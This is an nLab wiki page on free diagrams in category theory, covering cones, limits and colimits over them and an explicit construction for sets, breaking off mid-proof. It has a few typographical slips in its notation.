adc_start(ADC);  }/*********  Call back function for ADC Int **************/void ADC_Handler () {  while(!(((ADC->ADC_ISR & ADC_ISR_EOC7) && (ADC->ADC_ISR & ADC_ISR_EOC6) && (ADC->ADC_ISR & ADC_ISR_EOC5))));    if((*(ADC -> ADC_CDR+7) > 5) && (*(ADC -> ADC_CDR+7) < 2650)){ // range from 0.041 to 2.28V - > peak when ADC measures xxx      volt = *(ADC -> ADC_CDR+6); //max value after filter: 3.3V ok      volt = *(ADC -> ADC_CDR+5);      flag = 1;  }  }/*******  Timer Counter 0 Channel 1 to generate PWM pulses thru TIOA1  for ADC ********/void tc_adc_setup() {   PMC->PMC_PCER0 |= PMC_PCER0_PID28;                      // TC1 power ON : Timer Counter 0 channel 1  TC0->TC_CHANNEL.TC_CMR = TC_CMR_TCCLKS_TIMER_CLOCK2  // MCK/8, clk on rising edge                              | TC_CMR_WAVE               // Waveform mode                              | TC_CMR_WAVSEL_UP_RC       // UP mode with automatic trigger on RC Compare                              | TC_CMR_ACPA_CLEAR         // Clear TIOA1 on RA compare match                              | TC_CMR_ACPC_SET;          // Set TIOA1 on RC compare match  TC0->TC_CHANNEL.TC_RC = 1000;  //<********************   Frequency = (Mck/8)/TC_RC  Hz = 4000 Hz -> Adc can be sampled less frequently because  a range of 5 values verify the if caluse in adchandler  TC0->TC_CHANNEL.TC_RA = 20;    //<********************   Any Duty cycle in between 1 and TC_RC  TC0->TC_CHANNEL.TC_CCR = TC_CCR_CLKEN;               // TC1 enable}`\n\nGo Up" ]
[ null, "https://forum.arduino.cc/Themes/default/images/post/xx.png", null, "https://forum.arduino.cc/Themes/default/images/post/xx.png", null, "https://forum.arduino.cc/Themes/default/images/post/xx.png", null, "https://forum.arduino.cc/Themes/default/images/post/xx.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.96433836,"math_prob":0.8812467,"size":901,"snap":"2019-35-2019-39","text_gpt3_token_len":208,"char_repetition_ratio":0.09141583,"word_repetition_ratio":0.0,"special_character_ratio":0.22530521,"punctuation_ratio":0.098958336,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95942056,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-08-19T16:55:51Z\",\"WARC-Record-ID\":\"<urn:uuid:65afc796-e2a2-4778-ac0d-9d83a7341a26>\",\"Content-Length\":\"44538\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0960cedb-b089-4053-8b5f-f47b18461846>\",\"WARC-Concurrent-To\":\"<urn:uuid:88ab5a5e-bb97-4f73-a8f6-74fdfa683120>\",\"WARC-IP-Address\":\"104.20.191.47\",\"WARC-Target-URI\":\"https://forum.arduino.cc/index.php?topic=607595.0\",\"WARC-Payload-Digest\":\"sha1:SJ2OFPLKOUZS5CE6EIKYNDPLN6GLMK5M\",\"WARC-Block-Digest\":\"sha1:Q3Z2VPVSWKSSJHYRUW4GZRIFRDVGBML5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-35/CC-MAIN-2019-35_segments_1566027314852.37_warc_CC-MAIN-20190819160107-20190819182107-00355.warc.gz\"}"}
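The sketch's `loop()` emits a 6-byte serial frame: an STX byte (0x02), the 16-bit ADC reading sent twice as big-endian byte pairs, and a checksum that is the 8-bit sum of the four payload bytes (the `uint8_t checksum` truncates the sum). A host-side Python sketch of that framing (the function names are mine, not part of the posted code):

```python
def build_frame(volt):
    """Mirror of the sketch's loop(): STX, value twice (hi, lo), 8-bit checksum."""
    hi, lo = (volt >> 8) & 0xFF, volt & 0xFF
    payload = bytes([hi, lo, hi, lo])
    checksum = sum(payload) & 0xFF   # same truncation as the uint8_t on the DUE
    return bytes([0x02]) + payload + bytes([checksum])

def parse_frame(frame):
    """Return the ADC reading, or raise if the frame is malformed."""
    if len(frame) != 6 or frame[0] != 0x02:
        raise ValueError("bad frame")
    if sum(frame[1:5]) & 0xFF != frame[5]:
        raise ValueError("checksum mismatch")
    return (frame[1] << 8) | frame[2]

assert parse_frame(build_frame(0x0ABC)) == 0x0ABC
```

Since the 16-bit value is transmitted twice, a reader could additionally cross-check that bytes 1–2 equal bytes 3–4 before trusting a frame.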
https://studylib.net/doc/6608716/assignment-2
[ "# Assignment 2", null, "```BSAD 6312 Regression Assignment 2\nA. Using the handout distributed in class, answer the following for the model below:\nY = β0 + β1·X + ε\n\n1. Answer “Is it appropriate to interpret b0? Why or why not?” If so, test (using the\noutput) H0: β0 = 0 vs. the alternative H1: β0 ≠ 0. If so, construct (using the output) and interpret\nin context a 95% confidence interval estimate for β0.\n2. Test H0: β1 = 0 vs. the alternative H1: β1 ≠ 0. Construct and interpret in context a 95%\nconfidence interval estimate for β1.\n3. Interpret in context the coefficient of determination.\n4. For the value of X in the first observation, construct and interpret in context a 95%\nconfidence interval estimate for μY|x1.\n5. For the value of X in the last observation, construct and interpret in context a 95%\nprediction interval for Y|x1.\nB. Using the software of your choice, perform a simple regression with the UBSprices data and" ]
[ null, "https://s3.studylib.net/store/data/006608716_1-42f2b0d4df83af025f037f9c3a0b824e.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.73904735,"math_prob":0.91870344,"size":1358,"snap":"2020-45-2020-50","text_gpt3_token_len":344,"char_repetition_ratio":0.12924668,"word_repetition_ratio":0.1440678,"special_character_ratio":0.26215023,"punctuation_ratio":0.15679443,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9933966,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-25T03:29:20Z\",\"WARC-Record-ID\":\"<urn:uuid:16a480a6-4675-4f99-9fa4-e0447fe9121d>\",\"Content-Length\":\"67671\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ddc92cfb-0f71-4bb5-99e7-a2f940132f3b>\",\"WARC-Concurrent-To\":\"<urn:uuid:8a489c50-d750-4648-9bad-ed8e31581a7f>\",\"WARC-IP-Address\":\"104.24.125.188\",\"WARC-Target-URI\":\"https://studylib.net/doc/6608716/assignment-2\",\"WARC-Payload-Digest\":\"sha1:ROGR6V6EPNGU6G45UQVHAAOM3MPHFEZS\",\"WARC-Block-Digest\":\"sha1:QOXRIC5O44YTG2DB3PJDHDSTAQY4J77F\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107885126.36_warc_CC-MAIN-20201025012538-20201025042538-00472.warc.gz\"}"}
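The interval formulas behind items 1–5 can be sketched in plain Python. This uses a tiny toy dataset (the UBSprices file is not included here) and a t critical value looked up from a table for n − 2 = 2 degrees of freedom:

```python
import math

# Toy data standing in for the assignment's dataset.
xs = [1.0, 2.0, 3.0, 4.0]
ys = [2.1, 3.9, 6.2, 7.8]
n = len(xs)
xbar, ybar = sum(xs) / n, sum(ys) / n
sxx = sum((x - xbar) ** 2 for x in xs)
sxy = sum((x - xbar) * (y - ybar) for x, y in zip(xs, ys))

b1 = sxy / sxx                  # slope estimate
b0 = ybar - b1 * xbar           # intercept estimate
sse = sum((y - (b0 + b1 * x)) ** 2 for x, y in zip(xs, ys))
s2 = sse / (n - 2)              # residual variance
r2 = 1 - sse / sum((y - ybar) ** 2 for y in ys)  # coefficient of determination

t = 4.303                       # t_{0.025, n-2} for n = 4, from a t table
se_b1 = math.sqrt(s2 / sxx)
ci_b1 = (b1 - t * se_b1, b1 + t * se_b1)         # 95% CI for beta1

def mean_ci(x0):
    """95% CI for the mean response mu_{Y|x0} (item 4)."""
    half = t * math.sqrt(s2 * (1 / n + (x0 - xbar) ** 2 / sxx))
    yhat = b0 + b1 * x0
    return yhat - half, yhat + half

def pred_int(x0):
    """95% prediction interval for a new Y at x0 (item 5); note the extra 1."""
    half = t * math.sqrt(s2 * (1 + 1 / n + (x0 - xbar) ** 2 / sxx))
    yhat = b0 + b1 * x0
    return yhat - half, yhat + half
```

The prediction interval is always wider than the mean-response interval at the same x, because it carries the extra residual variance term.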
https://www.degruyter.com/view/journals/zna/36/4/article-p417.xml?currency=GBP
[ "# A Note on the Liouville Equation\n\nA. Grauel 1\n• 1 Fachbereich 6 der Universität-Gesamthochschule Paderborn\n\nWe study some geometrical features of the non-linear scattering equations. From this we deduce the Liouville equation. For that we interpret the SL(2, ℝ)-valued elements of the matrices in the scattering equations as matrix-valued forms and calculate the curvature 2-form with respect to a basis of the Lie algebra. We obtain the Liouville equation if the curvature form is equal to zero.\n\nOPEN ACCESS\n\n### Zeitschrift für Naturforschung A\n\nA Journal of Physical Sciences: Zeitschrift für Naturforschung A (ZNA) is an international scientific journal which publishes original research papers from all areas of experimental and theoretical physics. In accordance with the name of the journal, which means “Journal for Natural Sciences”, manuscripts submitted to ZNA should have a tangible connection to actual physical phenomena.", null, "", null, "" ]
[ null, "https://d26hddpfm66duo.cloudfront.net/assets/08c8e1c045dc2b34c9e3b1c154429c5995f19f36/core/spacer.gif", null, "https://d26hddpfm66duo.cloudfront.net/assets/08c8e1c045dc2b34c9e3b1c154429c5995f19f36/core/spacer.gif", null, "https://d26hddpfm66duo.cloudfront.net/assets/08c8e1c045dc2b34c9e3b1c154429c5995f19f36/core/spacer.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85341465,"math_prob":0.71959805,"size":779,"snap":"2020-34-2020-40","text_gpt3_token_len":155,"char_repetition_ratio":0.118709676,"word_repetition_ratio":0.0,"special_character_ratio":0.18100129,"punctuation_ratio":0.06818182,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9672322,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-08-11T22:24:37Z\",\"WARC-Record-ID\":\"<urn:uuid:de0c9659-9bb2-4244-83a8-fd1652e9c67a>\",\"Content-Length\":\"263991\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8075b09c-7897-402e-97c6-d4a1bfd69029>\",\"WARC-Concurrent-To\":\"<urn:uuid:95b62d80-c174-41a9-9011-f50ae0fedbb4>\",\"WARC-IP-Address\":\"52.17.168.29\",\"WARC-Target-URI\":\"https://www.degruyter.com/view/journals/zna/36/4/article-p417.xml?currency=GBP\",\"WARC-Payload-Digest\":\"sha1:I4EBSAUEVQS7MF57IC5OJANM6VYJ64RS\",\"WARC-Block-Digest\":\"sha1:G5OROKTDUFNCDVCABQ67KL6G32V4PUQ3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-34/CC-MAIN-2020-34_segments_1596439738855.80_warc_CC-MAIN-20200811205740-20200811235740-00004.warc.gz\"}"}
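The abstract's mechanism can be made concrete. Writing an sl(2, ℝ)-valued connection as $A = U\,dx + V\,dt$, the curvature 2-form is $F = dA + A \wedge A$, and flatness $F = 0$ is the compatibility condition $U_t - V_x + [U, V] = 0$. One explicit choice that reproduces the Liouville equation (my own illustration; these are not necessarily Grauel's matrices, and $\lambda$ is a spectral parameter that drops out of the curvature):

```latex
U = \begin{pmatrix} \varphi_x/2 & \lambda \\ 1 & -\varphi_x/2 \end{pmatrix},
\qquad
V = \begin{pmatrix} 0 & \tfrac{1}{2} e^{\varphi} \\ 0 & 0 \end{pmatrix},
\qquad
U_t - V_x + [U, V]
  = \tfrac{1}{2}\bigl(\varphi_{xt} - e^{\varphi}\bigr)
    \begin{pmatrix} 1 & 0 \\ 0 & -1 \end{pmatrix}.
```

The off-diagonal entries cancel identically, so vanishing curvature is exactly the Liouville equation $\varphi_{xt} = e^{\varphi}$.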
https://ncatlab.org/nlab/show/free+diagram
[ "Contents\n\ncategory theory\n\n# Contents\n\n## Idea\n\nA free diagram in a category $\\mathcal{C}$ is a particularly simple special case of the general concept of a diagram $X_\\bullet \\;\\colon\\; \\mathcal{I} \\to \\mathcal{C}$, namely the case where the shape $\\mathcal{I}$ of the diagram is a free category.\n\nMany important types of limits and colimits are over free diagrams, for instance products/coproducts, equalizers/coequalizers, pullbacks/pushouts, sequential limits/sequential colimits.\n\nDue to the simplicity of the concept of free diagrams, these types of limits and colimits may be discussed in a very low-brow way, without even making the concept of category and functor explicit. For this see the Exposition below.\n\n## Definition\n\nRecall that\n\n###### Definition\n\n(diagram)\n\nFor $\\mathcal{C}$ a category, then a diagram in $\\mathcal{C}$ is\n\n1. a small category $\\mathcal{I}$ , the shape of the diagram;\n\n2. a functor $X_\\bullet \\;\\colon\\; \\mathcal{I} \\to \\mathcal{C}$.\n\n###### Definition\n\n(free category)\n\n$Cat \\underoverset {\\underset{Underlying}{\\longrightarrow}} {\\overset{Free}{\\longleftarrow}} {\\bot} DirGraph$\n\nbetween the 1-categories of categories and that of directed graphs.\n\nA free category is one in the image of this left adjoint functor $Free \\colon DirGraph \\to Cat$ (sometimes called a “path category”).\n\n###### Definition\n\n(free diagram)\n\nA free diagram in a category $\\mathcal{C}$ is a diagram in $\\mathcal{C}$ (def. ) whose shape is a free category (def. ).\n\nIn other words, a free diagram in $\\mathcal{C}$ is\n\n1. a directed graph $I$;\n\n2. 
a functor of the form $X_\\bullet \\;\\colon\\; Free(I) \\to \\mathcal{C}$.\n\n## Examples\n\n###### Example\n\nTypes of free diagrams that are commonly encountered in practice, as well as the names of the limits/colimits over them are shown in the following table\n\n## Exposition\n\nWe give an exposition of free diagrams, and their cones and limits, intentionally avoiding abstract category-theoretic language, expressing everything just in components. See also at limits and colimits by example.\n\nFor concreteness, we speak only of diagrams of sets and of topological spaces in the following:\n\n###### Definition\n\n(free diagram of sets/topological spaces)\n\nA free diagram $X_\\bullet$ of sets or of topological spaces is\n\n1. a set $\\{ X_i \\}_{i \\in I}$ of sets or of topological spaces, respectively;\n\n2. for every pair $(i,j) \\in I \\times I$ of labels, a set $\\{ X_i \\overset{ f_\\alpha }{\\longrightarrow} X_j\\}_{\\alpha \\in I_{i,j}}$ of functions of of continuous functions, respectively, between these.\n\n###### Example\n\n(discrete diagram and empty diagram)\n\nLet $I$ be any set, and for each $(i,j) \\in I \\times I$ let $I_{i,j} = \\emptyset$ be the empty set.\n\nThe corresponding free diagrams (def. ) are simply a set of sets/topological spaces with no specified (continuous) functions between them. This is called a discrete diagram.\n\nFor example for $I = \\{1,2,3\\}$ the set with 3-elements, then such a diagram looks like this:\n\n$X_1 \\phantom{AAA} X_2 \\phantom{AAA} X_3 \\,.$\n\nNotice that here the index set may be empty set, $I = \\emptyset$, in which case the corresponding diagram consists of no data. 
This is also called the empty diagram.\n\n###### Definition\n\n(parallel morphisms diagram)\n\nLet $I = \\{a, b\\}$ be the set with two elements, and consider the sets\n\n$I_{i,j} \\;\\coloneqq\\; \\left\\{ \\array{ \\{ 1,2 \\} & \\vert & (i = a) \\,\\text{and}\\, (j = b) \\\\ \\emptyset & \\vert & \\text{otherwise} } \\right\\} \\,.$\n\nThe corresponding free diagrams (def. ) are called pairs of parallel morphisms. They may be depicted like so:\n\n$X_a \\underoverset {\\underset{f_2}{\\longrightarrow}} {\\overset{f_1}{\\longrightarrow}} {\\phantom{AAAAA}} X_b \\,.$\n###### Example\n\n(span and cospan diagram)\n\nLet $I = \\{a,b,c\\}$ the set with three elements, and set\n\n$I_{i ,j} = \\left\\{ \\array{ \\{f_1\\} & \\vert \\, (i = c) \\,\\text{and}\\, (j = a) \\\\ \\{f_2\\} & \\vert \\, (i = c) \\,\\text{and}\\, (j = b) \\\\ \\emptyset & \\vert \\, \\text{otherwise} } \\right.$\n\nThe corresponding free diagrams (def. ) look like so:\n\n$\\array{ && X_c \\\\ & {}^{\\mathllap{f_1}}\\swarrow && \\searrow^{\\mathrlap{f_2}} \\\\ X_a && && X_b } \\,.$\n\nThese are called span diagrams.\n\nSimilary, there is the cospan diagram of the form\n\n$\\array{ && X_c \\\\ & {}^{\\mathllap{f_1}}\\nearrow && \\nwarrow^{\\mathrlap{f_2}} \\\\ X_a && && X_b } \\,.$\n###### Example\n\n(tower diagram)\n\nLet $I = \\mathbb{N}$ be the set of natural numbers and consider\n\n$I_{i,j} \\;\\coloneqq\\; \\left\\{ \\array{ \\{f_{i,j}\\} & \\vert & i \\leq j \\\\ \\emptyset & \\vert & \\text{otherwise} } \\right.$\n\nThe corresponding free diagrams (def. ) are called tower diagrams. 
They look as follows:\n\n$X_0 \\overset{\\phantom{A}f_{0,1} \\phantom{A} }{\\longrightarrow} X_1 \\overset{\\phantom{A} f_{1,2} \\phantom{A} }{\\longrightarrow} X_2 \\overset{\\phantom{A} f_{2,3} \\phantom{A} }{\\longrightarrow} X_3 \\overset{}{\\longrightarrow} \\cdots \\,.$\n\nSimilarly there are co-tower diagram\n\n$X_0 \\overset{\\phantom{A} f_{0,1} \\phantom{A} }{\\longleftarrow} X_1 \\overset{\\phantom{A} f_{1,2} \\phantom{A}}{\\longleftarrow} X_2 \\overset{\\phantom{A} f_{2,3} \\phantom{A}}{\\longleftarrow} X_3 \\overset{}{\\longleftarrow} \\cdots \\,.$\n\n$\\,$\n\n###### Definition\n\n(cone over a free diagram)\n\nConsider a free diagram of sets or of topological spaces (def. )\n\n$X_\\bullet \\,=\\, \\left\\{ X_i \\overset{f_\\alpha}{\\longrightarrow} X_j \\right\\}_{i,j \\in I, \\alpha \\in I_{i,j}} \\,.$\n\nThen\n\n1. a cone over this diagram is\n\n1. a set or topological space $\\tilde X$ (called the tip of the cone);\n\n2. for each $i \\in I$ a function or continuous function $\\tilde X \\overset{p_i}{\\longrightarrow} X_i$\n\nsuch that\n\n• for all $(i,j) \\in I \\times I$ and all $\\alpha \\in I_{i,j}$ then the condition\n\n$f_{\\alpha} \\circ p_i = p_j$\n\nholds, which we depict as follows:\n\n$\\array{ && \\tilde X \\\\ & {}^{\\mathllap{p_i}}\\swarrow && \\searrow^{\\mathrlap{p_j}} \\\\ X_i && \\underset{f_\\alpha}{\\longrightarrow} && X_j }$\n2. a co-cone over this diagram is\n\n1. a set or topological space $\\tilde X$ (called the tip of the co-cone);\n\n2. 
for each $i \\in I$ a function or continuous function $q_i \\colon X_i \\longrightarrow \\tilde X$;\n\nsuch that\n\n• for all $(i,j) \\in I \\times I$ and all $\\alpha \\in I_{i,j}$ then the condition\n\n$q_j \\circ f_{\\alpha} = q_i$\n\nholds, which we depict as follows:\n\n$\\array{ X_i && \\overset{f_\\alpha}{\\longrightarrow} && X_j \\\\ & {}_{\\mathllap{q_i}}\\searrow && \\swarrow_{\\mathrlap{q_j}} \\\\ && \\tilde X } \\,.$\n###### Example\n\n(solutions to equations are cones)\n\nLet $f,g \\colon \\mathbb{R} \\to \\mathbb{R}$ be two functions from the real numbers to themselves, and consider the corresponding parallel morphism diagram of sets (example ):\n\n$\\mathbb{R} \\underoverset {\\underset{f_2}{\\longrightarrow}} {\\overset{f_1}{\\longrightarrow}} {\\phantom{AAAAA}} \\mathbb{R} \\,.$\n\nThen a cone (def. ) over this free diagram with tip the singleton set $\\ast$ is a solution to the equation $f(x) = g(x)$\n\n$\\array{ && \\ast \\\\ & {}^{\\mathllap{const_x}}\\swarrow && \\searrow^{\\mathrlap{const_y}} \\\\ \\mathbb{R} && \\underoverset {\\underset{f_2}{\\longrightarrow}} {\\overset{f_1}{\\longrightarrow}} {\\phantom{AAAAA}} && \\mathbb{R} } \\,.$\n\nNamely the components of the cone are two functions of the form\n\n$cont_x, const_y \\;\\colon\\; \\ast \\to \\mathbb{R}$\n\nhence equivalently two real numbers, and the conditions on these are\n\n$f_1 \\circ const_x = const_y \\phantom{AAAA} f_2 \\circ const_x = const_y \\,.$\n###### Definition\n\n(limiting cone over a diagram)\n\nConsider a free diagram of sets or of topological spaces (def. ):\n\n$\\left\\{ X_i \\overset{f_\\alpha}{\\longrightarrow} X_j \\right\\}_{i,j \\in I, \\alpha \\in I_{i,j}} \\,.$\n\nThen\n\n1. 
its limiting cone (or just limit for short, also “inverse limit”, for historical reasons) is the cone\n\n$\\left\\{ \\array{ && \\underset{\\longleftarrow}{\\lim}_k X_k \\\\ & {}^{\\mathllap{p_i}}\\swarrow && \\searrow^{\\mathrlap{p_j}} \\\\ X_i && \\underset{f_\\alpha}{\\longrightarrow} && X_j } \\right\\}$\n\nover this diagram (def. ) which is universal among all possible cones, in that for\n\n$\\left\\{ \\array{ && \\tilde X \\\\ & {}^{\\mathllap{p'_i}}\\swarrow && \\searrow^{\\mathrlap{p'_j}} \\\\ X_i && \\underset{f_\\alpha}{\\longrightarrow} && X_j } \\right\\}$\n\nany other cone, then there is a unique function or continuous function, respectively\n\n$\\phi \\;\\colon\\; \\tilde X \\overset{}{\\longrightarrow} \\underset{\\longrightarrow}{\\lim}_i X_i$\n\nthat factors the given cone through the limiting cone, in that for all $i \\in I$ then\n\n$p'_i = p_i \\circ \\phi$\n\nwhich we depict as follows:\n\n$\\array{ \\tilde X \\\\ {}^{\\mathllap{ \\exists !\\, \\phi}}\\downarrow & \\searrow^{\\mathrlap{p'_i}} \\\\ \\underset{\\longrightarrow}{\\lim}_i X_i &\\underset{p_i}{\\longrightarrow}& X_i }$\n2. its colimiting cocone (or just colimit for short, also “direct limit”, for historical reasons) is the cocone\n\n$\\left\\{ \\array{ X_i && \\overset{f_\\alpha}{\\longrightarrow} && X_j \\\\ & {}^{\\mathllap{q_i}}\\searrow && \\swarrow^{\\mathrlap{q_j}} \\\\ \\\\ && \\underset{\\longrightarrow}{\\lim}_i X_i } \\right\\}$\n\nunder this diagram (def. 
) which is universal among all possible co-cones, in that it has the property that for\n\n$\\left\\{ \\array{ X_i && \\overset{f_\\alpha}{\\longrightarrow} && X_j \\\\ & {}^{\\mathllap{q'_i}}\\searrow && \\swarrow_{\\mathrlap{q'_j}} \\\\ && \\tilde X } \\right\\}$\n\nany other cocone, then there is a unique function or continuous function, respectively\n\n$\\phi \\;\\colon\\; \\underset{\\longrightarrow}{\\lim}_i X_i \\overset{}{\\longrightarrow} \\tilde X$\n\nthat factors the given co-cone through the co-limiting cocone, in that for all $i \\in I$ then\n\n$q'_i = \\phi \\circ q_i$\n\nwhich we depict as follows:\n\n$\\array{ X_i &\\overset{q_i}{\\longrightarrow}& \\underset{\\longrightarrow}{\\lim}_i X_i \\\\ & {}_{q'_i}\\searrow & \\downarrow^{\\mathrlap{\\exists ! \\phi}} \\\\ && \\tilde X }$\n\n$\\,$\n\nAll the limits and colimits over the free diagram in the above list of examples have special names:\n\n###### Example\n\n(initial object and terminal object)\n\nConsider the empty diagram (def. ).\n\n1. A cone over the empty diagram is just an object $X$, with no further structure or condition. The universal property of the limit “ast$'' over the empty diagram is hence that for every object$X$, there is a unique map of the form$X \\to \\ast$. Such an object$\\ast$is called a terminal object. 2. A co.cone? over the empty diagram is just an object $X$, with no further structure or condition. The universal property of the colimit$'' over the empty diagram is hence that for every object$X$, there is a unique map of the form$0 \\to X$. Such an object$\\ast$ is called a initial object.\n\n###### Example\n\n(Cartesian product and coproduct)\n\nLet $\\{X_i\\}_{i \\in I}$ be a discrete diagram (example ), i.e. just a set of objects.\n\n1. The limit over this diagram is called the Cartesian product, denoted $\\underset{i \\in I}{\\prod} X_i$;\n\n2. 
The colimit over this diagram is called the coproducts, denoted $\\underset{i \\in I}{\\coprod} X_i$.\n\n###### Example\n\n(equalizer)\n\nLet\n\n$X_1 \\underoverset {\\underset{\\phantom{AA}f_2\\phantom{AA}}{\\longrightarrow}} {\\overset{\\phantom{AA}f_1\\phantom{AA}}{\\longrightarrow}} {} X_2$\n\nbe a free diagram of the shape “pair of parallel morphisms” (example ).\n\nA limit over this diagram according to def. is also called the equalizer of the maps $f_1$ and $f_2$. This is a set or topological space $eq(f_1,f_2)$ equipped with a map $eq(f_1,f_2) \\overset{p_1}{\\longrightarrow} X_1$, so that $f_1 \\circ p_1 = f_2 \\circ p_1$ and such that if $Y \\to X_1$ is any other map with this property\n\n$\\array{ && Y \\\\ && \\downarrow & \\searrow \\\\ eq(f_1,f_2) &\\overset{p_1}{\\longrightarrow}& X_1 & \\underoverset {\\underset{\\phantom{AA}f_2\\phantom{AA}}{\\longrightarrow}} {\\overset{\\phantom{AA}f_1\\phantom{AA}}{\\longrightarrow}} {} & X_2 }$\n\nthen there is a unique factorization through the equalizer:\n\n$\\array{ && Y \\\\ &{}^{\\mathllap{\\exists !}}\\swarrow& \\downarrow & \\searrow \\\\ eq(f_1,f_2) &\\overset{p_1}{\\longrightarrow}& X_1 & \\underoverset {\\underset{f_2}{\\longrightarrow}} {\\overset{f_1}{\\longrightarrow}} {} & X_2 } \\,.$\n\nIn example we have seen that a cone over such a pair of parallel morphisms is a solution to the equation $f_1(x) = f_2(x)$.\n\nThe equalizer above is the space of all solutions of this equation.\n\n###### Example\n\n(pullback/fiber product and coproduct)\n\nConsider a cospan diagram (example )\n\n$\\array{ && Y \\\\ && \\downarrow^{\\mathrlap{f}} \\\\ X &\\underset{g}{\\longrightarrow}& Z } \\,.$\n\nThe limit over this diagram is also called the fiber product of $X$ with $Y$ over $Z$, and denoted $X \\underset{Z}{\\times}Y$. 
Thought of as equipped with the projection map to $X$, this is also called the pullback of $f$ along $g$\n\n$\\array{ X \\underset{X}{\\times} Z &\\longrightarrow& Y \\\\ \\downarrow &(pb)& \\downarrow^{\\mathrlap{f}} \\\\ X &\\underset{g}{\\longrightarrow}& Z } \\,.$\n\nDually, consider a span diagram (example )\n\n$\\array{ Z &\\overset{g}{\\longrightarrow}& Y \\\\ {}^{\\mathllap{f}}\\downarrow \\\\ X }$\n\nThe colimit over this diagram is also called the pushout of $f$ along $g$, denoted $X \\underset{Z}{\\sqcup}Y$:\n\n$\\array{ Z &\\overset{g}{\\longrightarrow}& Y \\\\ {}^{\\mathllap{f}}\\downarrow &(po)& \\downarrow \\\\ X &\\longrightarrow& X \\underset{Z}{\\sqcup} Y }$\n\n$\\,$\n\nHere is a more explicit description of the limiting cone over a diagram of sets:\n\n###### Proposition\n\n(limits and colimits of sets)\n\nLet $\\left\\{ X_i \\overset{f_\\alpha}{\\longrightarrow} X_j \\right\\}_{i,j \\in I, \\alpha \\in I_{i,j}}$ be a free diagram of sets (def. ). Then\n\n1. its limit cone (def. ) is given by the following subset of the Cartesian product $\\underset{i \\in I}{\\prod} X_i$ of all the sets $X_i$ appearing in the diagram\n\n$\\underset{\\longleftarrow}{\\lim}_i X_i \\,\\overset{\\phantom{AAA}}{\\hookrightarrow}\\, \\underset{i \\in I}{\\prod} X_i$\n\non those tuples of elements which match the graphs of the functions appearing in the diagram:\n\n$\\underset{\\longleftarrow}{\\lim}_{i} X_i \\;\\simeq\\; \\left\\{ (x_i)_{i \\in I} \\,\\vert\\, \\underset{ {i,j \\in I} \\atop { \\alpha \\in I_{i,j} } }{\\forall} \\left( f_{\\alpha}(x_i) = x_j \\right) \\right\\}$\n\nand the projection functions are $p_i \\colon (x_j)_{j \\in I} \\mapsto x_i$.\n\n2. its colimiting co-cone (def. 
) is given by the quotient set of the disjoint union $\\underset{i \\in I}{\\sqcup} X_i$ of all the sets $X_i$ appearing in the diagram\n\n$\\underset{i \\in I}{\\sqcup} X_i \\,\\overset{\\phantom{AAA}}{\\longrightarrow}\\, \\underset{\\longrightarrow}{\\lim}_{i \\in I} X_i$\n\nwith respect to the equivalence relation which is generated from the graphs of the functions in the diagram:\n\n$\\underset{\\longrightarrow}{\\lim}_i X_i \\;\\simeq\\; \\left( \\underset{i \\in I}{\\sqcup} X_i \\right)/ \\left( (x \\sim x') \\Leftrightarrow \\left( \\underset{ {i,j \\in I} \\atop { \\alpha \\in I_{i,j} } }{\\exists} \\left( f_\\alpha(x) = x' \\right) \\right) \\right)$\n\nand the injection functions are the evident maps to equivalence classes:\n\n$q_i \\;\\colon\\; x_i \\mapsto [x_i] \\,.$\n###### Proof\n\nWe dicuss the proof of the first case. The second is directly analogous.\n\nFirst observe that indeed, by consturction, the projection maps $p_i$ as given do make a cone over the free diagram, by the very nature of the relation that is imposed on the tuples:\n\n$\\array{ && \\left\\{ (x_k)_{k \\in I} \\,\\vert\\, \\underset{ {i,j \\in I} \\atop { \\alpha \\in I_{i,j} } }{\\forall} \\left( f_{\\alpha}(x_i) = x_j \\right) \\right\\} \\\\ & {}^{\\mathllap{p_i}}\\swarrow && \\searrow^{\\mathrlap{p_j}} \\\\ X_i && \\underset{f_\\alpha}{\\longrightarrow} && X_j } \\,.$\n\nWe need to show that this is universal, in that any other cone over the free diagram factors universally through it. First consider the case that the tip of a give cone is a singleton:\n\n$\\array{ && \\ast \\\\ & {}^{\\mathllap{p'_i}}\\swarrow && \\searrow^{\\mathrlap{p'_j}} \\\\ X_i && \\underset{f_\\alpha}{\\longrightarrow} && X_j } \\,.$\n\nThis is hence equivalently for each $i \\in I$ an element $x'_i \\in X_i$, such that for all $i, j \\in I$ and $\\alpha \\in I_{i,j}$ then $f_\\alpha(x'_i) = x'_j$. 
